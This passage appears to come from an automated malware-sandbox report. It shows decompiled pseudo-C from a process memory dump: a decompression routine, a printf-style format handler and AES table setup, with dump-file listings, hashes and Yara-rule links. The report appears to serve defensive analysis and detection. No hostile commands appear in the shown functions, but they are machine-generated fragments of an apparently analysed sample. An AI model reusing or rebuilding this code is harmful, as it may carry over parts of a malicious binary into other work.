										asm("sbb eax, eax");
										_t77 = _t76 & _t138;
										__eflags = _t77;
										_t78 =  *(_t111 + 0xc88 + _t77 * 2) & 0x0000ffff;
										L28:
										__eflags = _t78 - 0x10;
										if(_t78 >= 0x10) {
											_t139 = _t168;
											__eflags = _t78 - 0x12;
											if(__eflags >= 0) {
												if(__eflags != 0) {
													_t114 = (E00D7A4E8(_t139) >> 9) + 0xb;
													__eflags = _t114;
													_push(7);
												} else {
													_t114 = (E00D7A4E8(_t139) >> 0xd) + 3;
													_push(3);
												}
												E00D7A4D1(_t168);
												while(1) {
													_t114 = _t114 - 1;
													__eflags = _t165 - 0x1ae;
													if(_t165 >= 0x1ae) {
														goto L46;
													}
													 *(_t171 + _t165 + 0x2c) = 0;
													_t165 = _t165 + 1;
													__eflags = _t114;
													if(_t114 != 0) {
														continue;
													}
													L44:
													_t111 =  *((intOrPtr*)(_t171 + 0x14));
													goto L45;
												}
												break;
											}
											__eflags = _t78 - 0x10;
											if(_t78 != 0x10) {
												_t121 = (E00D7A4E8(_t139) >> 9) + 0xb;
												__eflags = _t121;
												_push(7);
											} else {
												_t121 = (E00D7A4E8(_t139) >> 0xd) + 3;
												_push(3);
											}
											E00D7A4D1(_t168);
											__eflags = _t165;
											if(_t165 == 0) {
												L48:
												_t90 = 0;
												L50:
												L51:
												return _t90;
											} else {
												while(1) {
													_t121 = _t121 - 1;
													__eflags = _t165 - 0x1ae;
													if(_t165 >= 0x1ae) {
														goto L46;
													}
													 *(_t171 + _t165 + 0x2c) =  *((intOrPtr*)(_t171 + _t165 + 0x2b));
													_t165 = _t165 + 1;
													__eflags = _t121;
													if(_t121 != 0) {
														continue;
													}
													goto L44;
												}
												break;
											}
										}
										 *(_t171 + _t165 + 0x2c) = _t78;
										_t165 = _t165 + 1;
										goto L45;
									}
									_t150 = _t111 + (_t73 + 1) * 4;
									while(1) {
										__eflags = _t159 -  *_t150;
										if(_t159 <  *_t150) {
											break;
										}
										_t73 = _t73 + 1;
										_t150 = _t150 + 4;
										__eflags = _t73 - 0xf;
										if(_t73 < 0xf) {
											continue;
										}
										goto L27;
									}
									 *(_t171 + 0x10) = _t73;
									goto L27;
								}
								_t151 = 0x10;
								_t162 = _t159 >> _t151 - _t72;
								_t154 = ( *(_t162 + _t111 + 0x88) & 0x000000ff) +  *(_t168 + 4);
								 *_t168 =  *_t168 + (_t154 >> 3);
								 *(_t168 + 4) = _t154 & 0x00000007;
								_t78 =  *(_t111 + 0x488 + _t162 * 2) & 0x0000ffff;
								goto L28;
							}
							__eflags =  *_t168 -  *((intOrPtr*)(_t170 + 0x84)) - 5;
							if( *_t168 <=  *((intOrPtr*)(_t170 + 0x84)) - 5) {
								goto L19;
							}
							_t94 = E00D84422(_t170);
							__eflags = _t94;
							if(_t94 == 0) {
								goto L48;
							}
							goto L19;
							L45:
							__eflags = _t165 - 0x1ae;
						} while (_t165 < 0x1ae);
						L46:
						 *((char*)(_t170 + 0xe662)) = 1;
						__eflags =  *((char*)(_t168 + 8));
						if( *((char*)(_t168 + 8)) != 0) {
							L49:
							_t115 =  *((intOrPtr*)(_t171 + 0x1e8));
							_push(0x132);
							_push(_t115);
							_push(_t171 + 0x2c);
							E00D82C88();
							_push(0x40);
							_push(_t115 + 0xeec);
							_push(_t171 + 0x166);
							E00D82C88();
							_push(0x10);
							_push(_t115 + 0x1dd8);
							_push(_t171 + 0x1a6);
							E00D82C88();
							_push(0x2c);
							_push(_t115 + 0x2cc4);
							_push(_t171 + 0x1b6);
							E00D82C88();
							_t90 = 1;
							goto L50;
						}
						__eflags =  *_t168 -  *((intOrPtr*)(_t170 + 0x84));
						if( *_t168 <=  *((intOrPtr*)(_t170 + 0x84))) {
							goto L49;
						}
						goto L48;
					}
					__eflags =  *_t168 -  *((intOrPtr*)(__ecx + 0x84)) - 0x19;
					if( *_t168 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19) {
						goto L5;
					}
					_t90 = E00D84422(__ecx);
					__eflags = _t90;
					if(_t90 == 0) {
						goto L51;
					}
					goto L5;
				}
				return 1;
			}

































              0x00d8398e
              0x00d83990
              0x00d8399a
              0x00d839a1
              0x00d839a5
              0x00d839c1
              0x00d839c2
              0x00d839c2
              0x00d839c5
              0x00d839d3
              0x00d839d6
              0x00d839db
              0x00d839de
              0x00d83a17
              0x00000000
              0x00d83a17
              0x00d839ee
              0x00d839f1
              0x00d839f6
              0x00d839f8
              0x00d83a01
              0x00d83a01
              0x00d83a04
              0x00d83a04
              0x00d83a05
              0x00d83a08
              0x00000000
              0x00000000
              0x00d83a0a
              0x00d83a0f
              0x00d83a10
              0x00d83a12
              0x00000000
              0x00000000
              0x00000000
              0x00d83a12
              0x00d83a14
              0x00000000
              0x00d83a14
              0x00d839fa
              0x00d83a1b
              0x00d83a1b
              0x00d83a1c
              0x00d83a1c
              0x00d83a2c
              0x00d83a2e
              0x00d83a36
              0x00d83a37
              0x00d83a38
              0x00d83a3c
              0x00d83a41
              0x00d83a41
              0x00d83a43
              0x00d83a43
              0x00d83a47
              0x00d83a65
              0x00d83a67
              0x00d83a6e
              0x00d83a74
              0x00d83a7a
              0x00d83a7e
              0x00d83aab
              0x00d83aac
              0x00d83aad
              0x00d83ab1
              0x00d83ab3
              0x00d83ace
              0x00d83ad1
              0x00d83add
              0x00d83adf
              0x00d83ae3
              0x00d83ae8
              0x00d83af4
              0x00d83af6
              0x00d83af8
              0x00d83afa
              0x00d83afa
              0x00d83afc
              0x00d83b04
              0x00d83b04
              0x00d83b07
              0x00d83b13
              0x00d83b15
              0x00d83b18
              0x00d83b62
              0x00d83b7f
              0x00d83b7f
              0x00d83b82
              0x00d83b64
              0x00d83b6e
              0x00d83b71
              0x00d83b71
              0x00d83b86
              0x00d83b8b
              0x00d83b8b
              0x00d83b8c
              0x00d83b92
              0x00000000
              0x00000000
              0x00d83b94
              0x00d83b99
              0x00d83b9a
              0x00d83b9c
              0x00000000
              0x00000000
              0x00d83b9e
              0x00d83b9e
              0x00000000
              0x00d83b9e
              0x00000000
              0x00d83b8b
              0x00d83b1a
              0x00d83b1d
              0x00d83b3a
              0x00d83b3a
              0x00d83b3d
              0x00d83b1f
              0x00d83b29
              0x00d83b2c
              0x00d83b2c
              0x00d83b41
              0x00d83b46
              0x00d83b48
              0x00d83bc5
              0x00d83bc5
              0x00d83c2c
              0x00d83c2e
              0x00000000
              0x00d83b4a
              0x00d83b4a
              0x00d83b4a
              0x00d83b4b
              0x00d83b51
              0x00000000
              0x00000000
              0x00d83b57
              0x00d83b5b
              0x00d83b5c
              0x00d83b5e
              0x00000000
              0x00000000
              0x00000000
              0x00d83b60
              0x00000000
              0x00d83b4a
              0x00d83b48
              0x00d83b09
              0x00d83b0d
              0x00000000
              0x00d83b0d
              0x00d83ab8
              0x00d83abb
              0x00d83abb
              0x00d83abd
              0x00000000
              0x00000000
              0x00d83abf
              0x00d83ac0
              0x00d83ac3
              0x00d83ac6
              0x00000000
              0x00000000
              0x00000000
              0x00d83ac8
              0x00d83aca
              0x00000000
              0x00d83aca
              0x00d83a82
              0x00d83a85
              0x00d83a8f
              0x00d83a97
              0x00d83a9c
              0x00d83a9f
              0x00000000
              0x00d83a9f
              0x00d83a52
              0x00d83a54
              0x00000000
              0x00000000
              0x00d83a58
              0x00d83a5d
              0x00d83a5f
              0x00000000
              0x00000000
              0x00000000
              0x00d83ba2
              0x00d83ba2
              0x00d83ba2
              0x00d83bae
              0x00d83bae
              0x00d83bb5
              0x00d83bb9
              0x00d83bc9
              0x00d83bc9
              0x00d83bd4
              0x00d83bd9
              0x00d83bda
              0x00d83bdd
              0x00d83be2
              0x00d83bec
              0x00d83bf4
              0x00d83bf5
              0x00d83bfa
              0x00d83c04
              0x00d83c0c
              0x00d83c0d
              0x00d83c12
              0x00d83c1a
              0x00d83c22
              0x00d83c25
              0x00d83c2a
              0x00000000
              0x00d83c2a
              0x00d83bbd
              0x00d83bc3
              0x00000000
              0x00000000
              0x00000000
              0x00d83bc3
              0x00d839b0
              0x00d839b2
              0x00000000
              0x00000000
              0x00d839b4
              0x00d839b9
              0x00d839bb
              0x00000000
              0x00000000
              0x00000000
              0x00d839bb
              0x00000000

              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1094cbaabbb87eae24529d212b46aee9e342c03f428bb804a3628aa9adfdf6f1
              • Instruction ID: c0a91fdfb7edfe668cdcce73d0b417be0c8786350be93cc569f2096993b21403
              • Opcode Fuzzy Hash: 1094cbaabbb87eae24529d212b46aee9e342c03f428bb804a3628aa9adfdf6f1
              • Instruction Fuzzy Hash: F571E4712043459BDB28EF6DC8D4BBD76D4EB90B04F04492DE9CE8B282DA64DA85C772
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D93CBA, Relevance: .2, Instructions: 214COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 88%
              			E00D93CBA(void* __ecx) {
				char _v6;
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t49;
				signed int _t50;
				void* _t51;
				signed char _t54;
				signed char _t56;
				signed int _t57;
				signed int _t58;
				signed char _t67;
				signed char _t69;
				signed char _t71;
				signed char _t80;
				signed char _t82;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed char _t92;
				void* _t95;
				intOrPtr _t100;
				unsigned int _t102;
				signed char _t104;
				void* _t112;
				unsigned int _t113;
				void* _t114;
				signed int _t115;
				signed int* _t116;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t124;
				void* _t125;

				_push(__ecx);
				_t119 = __ecx;
				_t92 = 1;
				_t49 =  *((char*)(__ecx + 0x31));
				_t124 = _t49 - 0x64;
				if(_t124 > 0) {
					__eflags = _t49 - 0x70;
					if(__eflags > 0) {
						_t50 = _t49 - 0x73;
						__eflags = _t50;
						if(_t50 == 0) {
							L9:
							_t51 = E00D948A8(_t119);
							L10:
							if(_t51 != 0) {
								__eflags =  *((char*)(_t119 + 0x30));
								if( *((char*)(_t119 + 0x30)) == 0) {
									_t113 =  *(_t119 + 0x20);
									_push(_t114);
									_v8 = 0;
									_t115 = 0;
									_v6 = 0;
									_t54 = _t113 >> 4;
									__eflags = _t92 & _t54;
									if((_t92 & _t54) == 0) {
										L46:
										_t100 =  *((intOrPtr*)(_t119 + 0x31));
										__eflags = _t100 - 0x78;
										if(_t100 == 0x78) {
											L48:
											_t56 = _t113 >> 5;
											__eflags = _t92 & _t56;
											if((_t92 & _t56) != 0) {
												L50:
												__eflags = _t100 - 0x61;
												if(_t100 == 0x61) {
													L53:
													_t57 = 1;
													L54:
													__eflags = _t92;
													if(_t92 != 0) {
														L56:
														 *((char*)(_t121 + _t115 - 4)) = 0x30;
														__eflags = _t100 - 0x58;
														if(_t100 == 0x58) {
															L59:
															_t58 = 1;
															L60:
															__eflags = _t58;
															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
															_t115 = _t115 + 2;
															__eflags = _t115;
															L61:
															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
															__eflags = _t113 & 0x0000000c;
															if((_t113 & 0x0000000c) == 0) {
																E00D93184(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
																_t122 = _t122 + 0x10;
															}
															E00D94BA3(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
															_t102 =  *(_t119 + 0x20);
															_t116 = _t119 + 0x18;
															_t67 = _t102 >> 3;
															__eflags = _t67 & 0x00000001;
															if((_t67 & 0x00000001) != 0) {
																_t104 = _t102 >> 2;
																__eflags = _t104 & 0x00000001;
																if((_t104 & 0x00000001) == 0) {
																	E00D93184(_t119 + 0x448, 0x30, _t95, _t116);
																	_t122 = _t122 + 0x10;
																}
															}
															E00D94A71(_t95, _t119, _t116, _t119, 0);
															__eflags =  *_t116;
															if( *_t116 >= 0) {
																_t71 =  *(_t119 + 0x20) >> 2;
																__eflags = _t71 & 0x00000001;
																if((_t71 & 0x00000001) != 0) {
																	E00D93184(_t119 + 0x448, 0x20, _t95, _t116);
																}
															}
															_t69 = 1;
															L70:
															return _t69;
														}
														__eflags = _t100 - 0x41;
														if(_t100 == 0x41) {
															goto L59;
														}
														_t58 = 0;
														goto L60;
													}
													__eflags = _t57;
													if(_t57 == 0) {
														goto L61;
													}
													goto L56;
												}
												__eflags = _t100 - 0x41;
												if(_t100 == 0x41) {
													goto L53;
												}
												_t57 = 0;
												goto L54;
											}
											L49:
											_t92 = 0;
											__eflags = 0;
											goto L50;
										}
										__eflags = _t100 - 0x58;
										if(_t100 != 0x58) {
											goto L49;
										}
										goto L48;
									}
									_t80 = _t113 >> 6;
									__eflags = _t92 & _t80;
									if((_t92 & _t80) == 0) {
										__eflags = _t92 & _t113;
										if((_t92 & _t113) == 0) {
											_t82 = _t113 >> 1;
											__eflags = _t92 & _t82;
											if((_t92 & _t82) == 0) {
												goto L46;
											}
											_v8 = 0x20;
											L45:
											_t115 = _t92;
											goto L46;
										}
										_v8 = 0x2b;
										goto L45;
									}
									_v8 = 0x2d;
									goto L45;
								}
								_t69 = _t92;
								goto L70;
							}
							L11:
							_t69 = 0;
							goto L70;
						}
						_t84 = _t50;
						__eflags = _t84;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t51 = E00D946B3(_t119, _t114, __eflags);
							goto L10;
						}
						__eflags = _t84 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t51 = E00D94890(__ecx);
						goto L10;
					}
					__eflags = _t49 - 0x67;
					if(_t49 <= 0x67) {
						L30:
						_t51 = E00D942BF(_t92, _t119);
						goto L10;
					}
					__eflags = _t49 - 0x69;
					if(_t49 == 0x69) {
						L27:
						_t2 = _t119 + 0x20;
						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t49 - 0x6e;
					if(_t49 == 0x6e) {
						_t51 = E00D947FD(__ecx, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x6f;
					if(_t49 != 0x6f) {
						goto L11;
					}
					_t51 = E00D94871(__ecx);
					goto L10;
				}
				if(_t124 == 0) {
					goto L27;
				}
				_t125 = _t49 - 0x58;
				if(_t125 > 0) {
					_t86 = _t49 - 0x5a;
					__eflags = _t86;
					if(_t86 == 0) {
						_t51 = E00D941F9(__ecx);
						goto L10;
					}
					_t87 = _t86 - 7;
					__eflags = _t87;
					if(_t87 == 0) {
						goto L30;
					}
					__eflags = _t87;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t51 = E00D9458B(_t92, _t119, __eflags, 0);
					goto L10;
				}
				if(_t125 == 0) {
					_push(1);
					goto L13;
				}
				if(_t49 == 0x41) {
					goto L30;
				}
				if(_t49 == 0x43) {
					goto L17;
				}
				if(_t49 <= 0x44) {
					goto L11;
				}
				if(_t49 <= 0x47) {
					goto L30;
				}
				if(_t49 != 0x53) {
					goto L11;
				}
				goto L9;
			}






































              0x00d93cbf
              0x00d93cc2
              0x00d93cc6
              0x00d93cc9
              0x00d93ccd
              0x00d93cd0
              0x00d93d3e
              0x00d93d41
              0x00d93d90
              0x00d93d90
              0x00d93d93
              0x00d93d00
              0x00d93d02
              0x00d93d07
              0x00d93d09
              0x00d93dae
              0x00d93db2
              0x00d93dbb
              0x00d93dc0
              0x00d93dc1
              0x00d93dc5
              0x00d93dc7
              0x00d93dcc
              0x00d93dcf
              0x00d93dd1
              0x00d93dfa
              0x00d93dfa
              0x00d93dfd
              0x00d93e00
              0x00d93e07
              0x00d93e09
              0x00d93e0c
              0x00d93e0e
              0x00d93e12
              0x00d93e12
              0x00d93e15
              0x00d93e20
              0x00d93e20
              0x00d93e22
              0x00d93e22
              0x00d93e24
              0x00d93e2a
              0x00d93e2a
              0x00d93e2f
              0x00d93e32
              0x00d93e3d
              0x00d93e3d
              0x00d93e3f
              0x00d93e3f
              0x00d93e4a
              0x00d93e4e
              0x00d93e4e
              0x00d93e51
              0x00d93e57
              0x00d93e59
              0x00d93e5c
              0x00d93e6c
              0x00d93e71
              0x00d93e71
              0x00d93e86
              0x00d93e8b
              0x00d93e8e
              0x00d93e93
              0x00d93e96
              0x00d93e98
              0x00d93e9a
              0x00d93e9d
              0x00d93ea0
              0x00d93ead
              0x00d93eb2
              0x00d93eb2
              0x00d93ea0
              0x00d93eb9
              0x00d93ebe
              0x00d93ec1
              0x00d93ec6
              0x00d93ec9
              0x00d93ecb
              0x00d93ed8
              0x00d93edd
              0x00d93ecb
              0x00d93ee0
              0x00d93ee3
              0x00d93ee8
              0x00d93ee8
              0x00d93e34
              0x00d93e37
              0x00000000
              0x00000000
              0x00d93e39
              0x00000000
              0x00d93e39
              0x00d93e26
              0x00d93e28
              0x00000000
              0x00000000
              0x00000000
              0x00d93e28
              0x00d93e17
              0x00d93e1a
              0x00000000
              0x00000000
              0x00d93e1c
              0x00000000
              0x00d93e1c
              0x00d93e10
              0x00d93e10
              0x00d93e10
              0x00000000
              0x00d93e10
              0x00d93e02
              0x00d93e05
              0x00000000
              0x00000000
              0x00000000
              0x00d93e05
              0x00d93dd5
              0x00d93dd8
              0x00d93dda
              0x00d93de2
              0x00d93de4
              0x00d93dee
              0x00d93df0
              0x00d93df2
              0x00000000
              0x00000000
              0x00d93df4
              0x00d93df8
              0x00d93df8
              0x00000000
              0x00d93df8
              0x00d93de6
              0x00000000
              0x00d93de6
              0x00d93ddc
              0x00000000
              0x00d93ddc
              0x00d93db4
              0x00000000
              0x00d93db4
              0x00d93d0f
              0x00d93d0f
              0x00000000
              0x00d93d0f
              0x00d93d9a
              0x00d93d9a
              0x00d93d9d
              0x00d93d6f
              0x00d93d6f
              0x00d93d70
              0x00d93d72
              0x00d93d74
              0x00000000
              0x00d93d74
              0x00d93d9f
              0x00d93da2
              0x00000000
              0x00000000
              0x00d93da8
              0x00d93d17
              0x00d93d17
              0x00000000
              0x00d93d17
              0x00d93d43
              0x00d93d86
              0x00000000
              0x00d93d86
              0x00d93d45
              0x00d93d48
              0x00d93d7b
              0x00d93d7d
              0x00000000
              0x00d93d7d
              0x00d93d4a
              0x00d93d4d
              0x00d93d6b
              0x00d93d6b
              0x00d93d6b
              0x00d93d6b
              0x00000000
              0x00d93d6b
              0x00d93d4f
              0x00d93d52
              0x00d93d64
              0x00000000
              0x00d93d64
              0x00d93d54
              0x00d93d57
              0x00000000
              0x00000000
              0x00d93d5b
              0x00000000
              0x00d93d5b
              0x00d93cd2
              0x00000000
              0x00000000
              0x00d93cd8
              0x00d93cdb
              0x00d93d1b
              0x00d93d1b
              0x00d93d1e
              0x00d93d37
              0x00000000
              0x00d93d37
              0x00d93d20
              0x00d93d20
              0x00d93d23
              0x00000000
              0x00000000
              0x00d93d26
              0x00d93d29
              0x00000000
              0x00000000
              0x00d93d2b
              0x00d93d2e
              0x00000000
              0x00d93d2e
              0x00d93cdd
              0x00d93d16
              0x00000000
              0x00d93d16
              0x00d93ce2
              0x00000000
              0x00000000
              0x00d93ceb
              0x00000000
              0x00000000
              0x00d93cf0
              0x00000000
              0x00000000
              0x00d93cf5
              0x00000000
              0x00000000
              0x00d93cfe
              0x00000000
              0x00000000
              0x00000000

              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
              • Instruction ID: b1eccf8dffb948b2fa8e8a255b17fc06cf06d96f4164fa0151966a320cb64d25
              • Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
              • Instruction Fuzzy Hash: 4A515771604B8457DF38966885B6BFF6BD9DB12704F1C0A19E883CB282C615EF46C3B6
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D7DADD, Relevance: .2, Instructions: 190COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 97%
              			E00D7DADD() {
				intOrPtr _v8;
				char _v521;
				char _t140;
				signed int _t154;
				signed int _t155;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t162;
				signed int _t179;
				signed int _t181;
				signed char _t192;
				signed int _t199;
				signed int _t207;
				void* _t208;
				signed int _t209;
				signed char _t211;
				signed int _t219;
				void* _t220;

				_t140 = 0;
				_t179 = 1;
				_t207 = 1;
				do {
					 *(_t220 + _t140 - 0x304) = _t207;
					 *(_t220 + _t140 - 0x205) = _t207;
					 *((char*)(_t220 + _t207 - 0x104)) = _t140;
					_v8 = _t140 + 1;
					asm("sbb ecx, ecx");
					_t140 = _v8;
					_t207 = _t207 ^  ~(_t207 & 0x80) & 0x0000011b ^ _t207 + _t207;
				} while (_t207 != 1);
				_t208 = 0;
				do {
					 *(_t208 + 0xdb4330) = _t179;
					asm("sbb ecx, ecx");
					_t179 = _t179 + _t179 ^  ~(_t179 & 0x80) & 0x0000011b;
					_t208 = _t208 + 1;
				} while (_t208 < 0x1e);
				_t181 = 0;
				do {
					if(_t181 == 0) {
						_t209 = 0;
					} else {
						_t209 =  *( &_v521 - ( *(_t220 + (_t181 & 0x000000ff) - 0x104) & 0x000000ff)) & 0x000000ff;
					}
					_t192 = (_t209 ^ (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209) + (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209) ^ 0x00006300) >> 0x00000008 ^ _t209 ^ (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209) + (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209);
					 *(_t181 + 0xdb4130) = _t192;
					 *(0xdb4f51 + _t181 * 4) = _t192;
					 *(0xdb4f50 + _t181 * 4) = _t192;
					 *(0xdb4b53 + _t181 * 4) = _t192;
					 *(0xdb4b50 + _t181 * 4) = _t192;
					 *(0xdb4753 + _t181 * 4) = _t192;
					 *(0xdb4752 + _t181 * 4) = _t192;
					 *(0xdb4352 + _t181 * 4) = _t192;
					 *(0xdb4351 + _t181 * 4) = _t192;
					if(_t192 == 0) {
						_t154 = 0;
					} else {
						_t154 =  *(_t220 + ( *(_t220 + (_t192 & 0x000000ff) - 0x104) & 0x000000ff) - 0x2eb) & 0x000000ff;
					}
					 *(0xdb4f53 + _t181 * 4) = _t154;
					 *(0xdb4b52 + _t181 * 4) = _t154;
					 *(0xdb4751 + _t181 * 4) = _t154;
					 *(0xdb4350 + _t181 * 4) = _t154;
					if(_t192 == 0) {
						_t155 = 0;
					} else {
						_t155 =  *(_t220 + ( *(_t220 + (_t192 & 0x000000ff) - 0x104) & 0x000000ff) - 0x303) & 0x000000ff;
					}
					_t219 = _t181 & 0x000000ff;
					 *(0xdb4f52 + _t181 * 4) = _t155;
					 *(0xdb4b51 + _t181 * 4) = _t155;
					 *(0xdb4750 + _t181 * 4) = _t155;
					 *(0xdb4353 + _t181 * 4) = _t155;
					if((((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) >> 0x00000008 ^ ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219)) == 5) {
						_t211 = 0;
					} else {
						_t211 =  *((intOrPtr*)( &_v521 - ( *(_t220 + (((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) >> 0x00000008 & 0x000000ff ^ ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) & 0x000000ff ^ 0x00000005) - 0x104) & 0x000000ff)));
					}
					 *(_t181 + 0xdb4230) = _t211;
					if(_t211 == 0) {
						_t159 = 0;
					} else {
						_t159 =  *(_t220 + ( *(_t220 + (_t211 & 0x000000ff) - 0x104) & 0x000000ff) - 0x29c) & 0x000000ff;
					}
					_t199 = _t211 & 0x000000ff;
					 *(0xdb5f52 + _t181 * 4) = _t159;
					 *(0xdb5b51 + _t181 * 4) = _t159;
					 *(0xdb5750 + _t181 * 4) = _t159;
					 *(0xdb5353 + _t181 * 4) = _t159;
					 *(0xdb6f52 + _t199 * 4) = _t159;
					 *(0xdb6b51 + _t199 * 4) = _t159;
					 *(0xdb6750 + _t199 * 4) = _t159;
					 *(0xdb6353 + _t199 * 4) = _t159;
					if(_t211 == 0) {
						_t160 = 0;
					} else {
						_t160 =  *(_t220 + ( *(_t220 + _t199 - 0x104) & 0x000000ff) - 0x23d) & 0x000000ff;
					}
					 *(0xdb5f50 + _t181 * 4) = _t160;
					 *(0xdb5b53 + _t181 * 4) = _t160;
					 *(0xdb5752 + _t181 * 4) = _t160;
					 *(0xdb5351 + _t181 * 4) = _t160;
					 *(0xdb6f50 + _t199 * 4) = _t160;
					 *(0xdb6b53 + _t199 * 4) = _t160;
					 *(0xdb6752 + _t199 * 4) = _t160;
					 *(0xdb6351 + _t199 * 4) = _t160;
					if(_t211 == 0) {
						_t161 = 0;
					} else {
						_t161 =  *(_t220 + ( *(_t220 + _t199 - 0x104) & 0x000000ff) - 0x216) & 0x000000ff;
					}
					 *(0xdb5f51 + _t181 * 4) = _t161;
					 *(0xdb5b50 + _t181 * 4) = _t161;
					 *(0xdb5753 + _t181 * 4) = _t161;
					 *(0xdb5352 + _t181 * 4) = _t161;
					 *(0xdb6f51 + _t199 * 4) = _t161;
					 *(0xdb6b50 + _t199 * 4) = _t161;
					 *(0xdb6753 + _t199 * 4) = _t161;
					 *(0xdb6352 + _t199 * 4) = _t161;
					if(_t211 == 0) {
						_t162 = 0;
					} else {
						_t162 =  *(_t220 + ( *(_t220 + _t199 - 0x104) & 0x000000ff) - 0x225) & 0x000000ff;
					}
					 *(0xdb5f53 + _t181 * 4) = _t162;
					 *(0xdb5b52 + _t181 * 4) = _t162;
					 *(0xdb5751 + _t181 * 4) = _t162;
					 *(0xdb5350 + _t181 * 4) = _t162;
					_t181 = _t181 + 1;
					 *(0xdb6f53 + _t199 * 4) = _t162;
					 *(0xdb6b52 + _t199 * 4) = _t162;
					 *(0xdb6751 + _t199 * 4) = _t162;
					 *(0xdb6350 + _t199 * 4) = _t162;
				} while (_t181 < 0x100);
				return _t162;
			}






















              0x00d7dae6
              0x00d7daeb
              0x00d7daed
              0x00d7daf4
              0x00d7daf4
              0x00d7dafb
              0x00d7db02
              0x00d7db0a
              0x00d7db19
              0x00d7db1f
              0x00d7db22
              0x00d7db24
              0x00d7db28
              0x00d7db2a
              0x00d7db2c
              0x00d7db39
              0x00d7db3f
              0x00d7db41
              0x00d7db42
              0x00d7db47
              0x00d7db49
              0x00d7db4b
              0x00d7db65
              0x00d7db4d
              0x00d7db60
              0x00d7db60
              0x00d7db83
              0x00d7db85
              0x00d7db8b
              0x00d7db92
              0x00d7db99
              0x00d7dba0
              0x00d7dba7
              0x00d7dbae
              0x00d7dbb5
              0x00d7dbbc
              0x00d7dbc5
              0x00d7dbdc
              0x00d7dbc7
              0x00d7dbd2
              0x00d7dbd2
              0x00d7dbde
              0x00d7dbe5
              0x00d7dbec
              0x00d7dbf3
              0x00d7dbfc
              0x00d7dc13
              0x00d7dbfe
              0x00d7dc09
              0x00d7dc09
              0x00d7dc15
              0x00d7dc1a
              0x00d7dc26
              0x00d7dc32
              0x00d7dc3b
              0x00d7dc4b
              0x00d7dc7f
              0x00d7dc4d
              0x00d7dc7b
              0x00d7dc7b
              0x00d7dc81
              0x00d7dc89
              0x00d7dca0
              0x00d7dc8b
              0x00d7dc96
              0x00d7dc96
              0x00d7dca2
              0x00d7dca5
              0x00d7dcac
              0x00d7dcb3
              0x00d7dcba
              0x00d7dcc1
              0x00d7dcc8
              0x00d7dccf
              0x00d7dcd6
              0x00d7dcdf
              0x00d7dcf3
              0x00d7dce1
              0x00d7dce9
